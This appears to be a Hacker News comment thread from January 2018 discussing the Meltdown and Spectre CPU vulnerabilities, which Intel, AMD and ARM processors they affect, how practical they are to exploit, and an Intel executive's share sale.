For his sake, I hope longer than 6 months!


You mean without getting whomped for insider trading? I don't think they're allowed to do it in advance at all.


As far as I know they HAVE to register a trade in advance, e.g. three months ahead: "I will sell 600 shares on the 15th of December if the share price is above 50". This information is public and other people can use it before the trade actually happens.


Note that's not a legal requirement. That's just a policy many companies have to lower the risk of insider trading.


It looks like he registered for the trade in October, well after Intel was made aware of the issue.


We won't know until we have the full details. From the Linux patches it looked like AMD x86-64 processors were not affected.

But the sentence you quote adds AMD back into play. Maybe some of its ARM processors? e.g. AMD Opteron A1100?


They weren't affected by the really bad Intel bug named Meltdown. They're still susceptible to Spectre.


And yet it also says that AMD devices running Android are not vulnerable.

I'd be curious how those two statements should be reconciled.


Not exactly; it says "we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices."


Links to descriptions of similar vulnerabilities in AMD and ARM processors would be very welcome.


Here's a list of what google tested:

Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)

AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)

AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)

An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


So there's a bit of an unknown as to whether AMD's most recent generation of processors has the Spectre vulnerability?


We know that the scariest attack, "Meltdown", cannot be reproduced on AMD or ARM chips at all [1]. The second attack, "Spectre", is also greatly mitigated due to the neural network predicting pathways for the application. Thus it's unlikely/less likely that you'll be able to access other locations in memory [2]. However, it's definitely possible.

[1] https://meltdownattack.com/meltdown.pdf

[2] https://spectreattack.com/spectre.pdf


ARM advisory [1] does state that Cortex-A75 is vulnerable to variant 3 (Meltdown).

[1] https://developer.arm.com/support/security-update


Has anyone tried the Spectre PoC in the paper on ThreadRipper? I can confirm it works on my i7-7700K.


Sounds like maybe SOME ARM and SOME AMD chips are implicated, especially since the Android ARM CPUs appear to be fine...


There aren't really any special Android ARM CPUs; maybe they are confident it doesn't really work on Android because it's very difficult to get the timing precision and low-level assembly sequences in Java/ART-compiled code. Though I wonder how that squares with JNI.

I think the key to the statement is in any case that you need to differentiate between what is possible on the processor architecture level when you have full software control, and what is possible on an operating system level, where 3rd party applications are further restricted in various arbitrary ways such as only allowed to use Java, limited access to high resolution timing primitives, etc. that can make practical exploitation impossible, even if the flaw is present.

It's difficult to reason about because it's hard to tell if you can manipulate a JIT runtime into generating the code you need for the exploit to work - and as the JavaScript implementations show, the answer is often "yes".


JIT engines (and compilers) often generate familiar instruction patterns. Many JIT engines target specific languages (like JS) and as a result have "simpler" optimizers (less time to do this) and possibly more stable instruction patterns. So my money is on somebody fuzzing the required JS code.


You can develop Android applications in C/C++ using the NDK, thus giving you full software control if needed.



Yeah, the Intel response page is filled with people claiming Intel is evil for even mentioning AMD.

https://news.ycombinator.com/item?id=16064545


To be fair, the Intel post alludes to collaborating with AMD/ARM on mitigating Spectre, but userspace memory leaking is wholly separate from kernel memory leaking (Meltdown, which only affects Intel processors).


It's a developing story, but from the information we have so far, it does look like Intel involving AMD is disingenuous, since AMD processors are not affected by the most serious of the issues.


It's too early to say which will ultimately be the most serious in the real world.

From the Spectre note (which does affect AMD):

In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

How quickly are we going to see attacks targeting BTC/ETH wallets, apps etc. on clients and cloud hosted exchanges?


Hardware wallet or bust right now, right? Use a private key that has never touched the internet?

